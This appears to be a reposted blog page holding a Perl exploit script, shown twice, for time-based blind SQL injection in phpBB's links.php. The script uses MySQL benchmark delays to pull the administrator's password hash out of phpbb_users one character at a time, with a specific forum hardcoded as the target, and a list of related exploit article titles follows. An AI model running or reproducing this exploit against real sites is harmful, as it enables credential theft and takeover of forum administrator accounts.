PHPBB links.php Remote SQL Injection
2007-12-14 09:23
387 查看
#PHPBB links.php Remote SQL Injection
# By Love Fly thanks Flyh4t,Spr1t3
# webwangqi@163.com
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
######################################## CONFIGURAZIONE EXPLOIT ##########################################################################
$sito = "http://www.gbabel.com/en/forum/"; # insert vulnerable site as http://[site]/[path]/
##########################################################################################################################################
$var = "1";
my $hash;
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
sub richiesta {
$var = $_[0];
$ua = LWP::UserAgent->new;
$inizio=Time::HiRes::time();
$response = $ua->request(GET $var,
s => $var);
$response->is_success() || print("$!\n");
$fine=Time::HiRes::time();
$tempo=$fine-$inizio;
return $tempo
}
sub aggiorna{
system("cls");
print "Tempo sql : " . $_[4] . " secondi\n";
print "Hash : " . $_[3] . "\n";
}
#print richiesta;
for ($i=1;$i<33;$i++)
{
for ($j=0;$j<16;$j++)
{
$var=$sito."links.php?t=sub_pages&cat=(Select IF((ASCII(SUBSTRING(`user_password`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM phpbb_users Where `user_id`=2)/*";
$tempo=richiesta($var);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$tempo=richiesta($var);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$hash .=chr($array[$j]);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
$j=200;
}
}
}
if($i==1)
{
if($hash eq "")
{
$i=200;
print "Attacco Fallito Sito Fixato\n";
}
}
}
print "Attacco Terminato\n\n";
system("pause");
# By Love Fly thanks Flyh4t,Spr1t3
# webwangqi@163.com
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
######################################## CONFIGURAZIONE EXPLOIT ##########################################################################
$sito = "http://www.gbabel.com/en/forum/"; # insert vulnerable site as http://[site]/[path]/
##########################################################################################################################################
$var = "1";
my $hash;
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
sub richiesta {
$var = $_[0];
$ua = LWP::UserAgent->new;
$inizio=Time::HiRes::time();
$response = $ua->request(GET $var,
s => $var);
$response->is_success() || print("$!\n");
$fine=Time::HiRes::time();
$tempo=$fine-$inizio;
return $tempo
}
sub aggiorna{
system("cls");
print "Tempo sql : " . $_[4] . " secondi\n";
print "Hash : " . $_[3] . "\n";
}
#print richiesta;
for ($i=1;$i<33;$i++)
{
for ($j=0;$j<16;$j++)
{
$var=$sito."links.php?t=sub_pages&cat=(Select IF((ASCII(SUBSTRING(`user_password`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM phpbb_users Where `user_id`=2)/*";
$tempo=richiesta($var);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$tempo=richiesta($var);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
if($tempo>9)
{
$hash .=chr($array[$j]);
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
$j=200;
}
}
}
if($i==1)
{
if($hash eq "")
{
$i=200;
print "Attacco Fallito Sito Fixato\n";
}
}
}
print "Attacco Terminato\n\n";
system("pause");
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- phpBB Links MOD Remote Blind SQL Injection Exploit
- dedecms /include/helpers/archive.helper.php SQL Injection Vul
- How does Android, PHP, SQL, JSON, and Remote Databases work together?
- What’s the Right Way to Prevent SQL Injection in PHP Scripts?
- QIBO CMS SQL Injection Via Variable Uninitialization In \member\special.php
- php SQL Injection with MySQL
- duxcms SQL Injection In /admin/module/loginMod.class.php
- dedecms /plus/search.php SQL Injection && Local Variable Overriding
- dedecms /include/uploadsafe.inc.php SQL Injection Via Local Variable Overriding Vul
- dedecms /plus/stow.php Twice SQL Injection
- Mongodb is vulnerable to SQL injection in PHP at least
- vBulletin version 4.0.1 remote SQL injection exploit
- ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding
- dedecms /plus/search.php SQL Injection && Local Variable Overriding
- phpBB 2.0.13 Path Disclosure And Remote php File Include
- phpBB 2.0.13 Path Disclosure And Remote php File Include
- php SQL Injection with MySQL
- ecshop /category.php SQL Injection Vul
- dedeCMS /data/mysql_error_trace.php DB error raised PHP Code Injection Via /include/dedesql.class.php Log FIle Without Access Validation